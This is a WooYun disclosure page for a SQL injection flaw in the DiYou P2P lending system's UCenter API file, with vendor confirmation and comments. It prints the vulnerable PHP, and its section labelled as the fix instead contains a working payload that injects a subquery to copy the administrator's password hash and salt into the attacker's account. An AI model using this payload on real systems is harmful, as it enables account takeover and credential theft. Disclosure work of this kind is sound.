当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(9) 关注此漏洞

缺陷编号: WooYun-2015-146539

漏洞标题: 帝友P2P借货系统某处文件设计缺陷可注入(任意登录/修改密码)

相关厂商: 厦门帝网信息科技有限公司

漏洞作者: Xser

提交时间: 2015-10-14 10:45

公开时间: 2016-01-17 10:28

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

2人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-14: 细节已通知厂商并且等待厂商处理中
2015-10-19: 厂商已经确认,细节仅向厂商公开
2015-10-22: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2015-12-13: 细节向核心白帽子及相关领域专家公开
2015-12-23: 细节向普通白帽子公开
2016-01-02: 细节向实习白帽子公开
2016-01-17: 细节向公众公开

简要描述:

如题如题

详细说明:

出现在uc接口文件上modules\ucenter\api\uc.php



code 区域
error_reporting(7);





define('UC_CLIENT_ROOT', DISCUZ_ROOT.'./client/');


chdir('../');


require_once './config.inc.php';





$code = $_GET['code'];


parse_str(authcode($code, 'DECODE', UC_KEY), $get);


if(MAGIC_QUOTES_GPC) {


	$get = dstripslashes($get);


}





没有判断uc是否开关

而且

code 区域
if(MAGIC_QUOTES_GPC) {


	$get = dstripslashes($get)

这里把gpc去掉了



code 区域
function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {





	$ckey_length = 4;





	$key = md5($key ? $key : UC_KEY);


	$keya = md5(substr($key, 0, 16));


	$keyb = md5(substr($key, 16, 16));


	$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';





	$cryptkey = $keya.md5($keya.$keyc);


	$key_length = strlen($cryptkey);





	$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;


	$string_length = strlen($strin





自带的加密函数,key默认是空的



所以导致注入了



code 区域
elseif($action == 'renameuser') {





	!API_RENAMEUSER && exit(API_RETURN_FORBIDDEN);





	//用户改名 API 接口


	$uid = $get['uid'];


	$usernamenew = $get['newusername'];





	$db->query("UPDATE {$tablepre}members SET username='$usernamenew' WHERE uid='$uid'");





	exit(API_RETURN_SUCCEED);

随便找到一处

可以注入

QQ截图20151013212342.png



案例:

code 区域
**.**.**.** **.**.**.** **.**.**.** **.**.**.** **.**.**.**

漏洞证明:

出现在uc接口文件上modules\ucenter\api\uc.php



code 区域
error_reporting(7);





define('UC_CLIENT_ROOT', DISCUZ_ROOT.'./client/');


chdir('../');


require_once './config.inc.php';





$code = $_GET['code'];


parse_str(authcode($code, 'DECODE', UC_KEY), $get);


if(MAGIC_QUOTES_GPC) {


	$get = dstripslashes($get);


}





没有判断uc是否开关

而且

code 区域
if(MAGIC_QUOTES_GPC) {


	$get = dstripslashes($get)

这里把gpc去掉了



code 区域
function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {





	$ckey_length = 4;





	$key = md5($key ? $key : UC_KEY);


	$keya = md5(substr($key, 0, 16));


	$keyb = md5(substr($key, 16, 16));


	$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';





	$cryptkey = $keya.md5($keya.$keyc);


	$key_length = strlen($cryptkey);





	$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;


	$string_length = strlen($strin





自带的加密函数,key默认是空的



所以导致注入了



code 区域
elseif($action == 'renameuser') {





	!API_RENAMEUSER && exit(API_RETURN_FORBIDDEN);





	//用户改名 API 接口


	$uid = $get['uid'];


	$usernamenew = $get['newusername'];





	$db->query("UPDATE {$tablepre}members SET username='$usernamenew' WHERE uid='$uid'");





	exit(API_RETURN_SUCCEED);

随便找到一处

可以注入

QQ截图20151013212342.png



案例:

code 区域
**.**.**.** **.**.**.** **.**.**.** **.**.**.** **.**.**.**

修复方案:

code 区域
<?php 


$_G['time'] =  time()+10*36000;


$_G['action'] =  'renameuser';


$_G['newusername'] = "xser',email=(SELECT ROW FROM(SELECT CONCAT(userid,0x7c,username,0x7c,PASSWORD,0x7c,salt) ROW FROM #table_member WHERE userid = 1 limit 0,1)X1 )  where username = 'xser' #";// 数据更新到你的账号上。


$code = urlencode(_authcode(http_build_query($_G), 'ENCODE'));


echo $code;





function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {





	$ckey_length = 4;





	$key = md5($key ? $key : UC_KEY);


	$keya = md5(substr($key, 0, 16));


	$keyb = md5(substr($key, 16, 16));


	$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';





	$cryptkey = $keya.md5($keya.$keyc);


	$key_length = strlen($cryptkey);





	$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;


	$string_length = strlen($string);





	$result = '';


	$box = range(0, 255);





	$rndkey = array();


	for($i = 0; $i <= 255; $i++) {


		$rndkey[$i] = ord($cryptkey[$i % $key_length]);


	}





	for($j = $i = 0; $i < 256; $i++) {


		$j = ($j + $box[$i] + $rndkey[$i]) % 256;


		$tmp = $box[$i];


		$box[$i] = $box[$j];


		$box[$j] = $tmp;


	}





	for($a = $j = $i = 0; $i < $string_length; $i++) {


		$a = ($a + 1) % 256;


		$j = ($j + $box[$a]) % 256;


		$tmp = $box[$a];


		$box[$a] = $box[$j];


		$box[$j] = $tmp;


		$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));


	}


?>

版权声明:转载请注明来源 Xser@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-10-19 10:27

厂商回复:

感谢您的提交,在我们早期的V3版本中确实存在这类的问题,已提交研发部门进行相关漏洞的修复,再次感谢您对我们帝友的关注。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2015-10-14 11:02 | 牛肉包子 ( 普通白帽子 | Rank:307 漏洞数:70 | baozisec)
    0

    UC.php ?

    1# 回复此人
  2. 2015-10-14 12:36 | menmen519 ( 普通白帽子 | Rank:914 漏洞数:161 | http://menmen519.blog.sohu.com/)
    0

    你把我都刷屏了 厉害

    2# 回复此人

登录后才能发表评论,请先 登录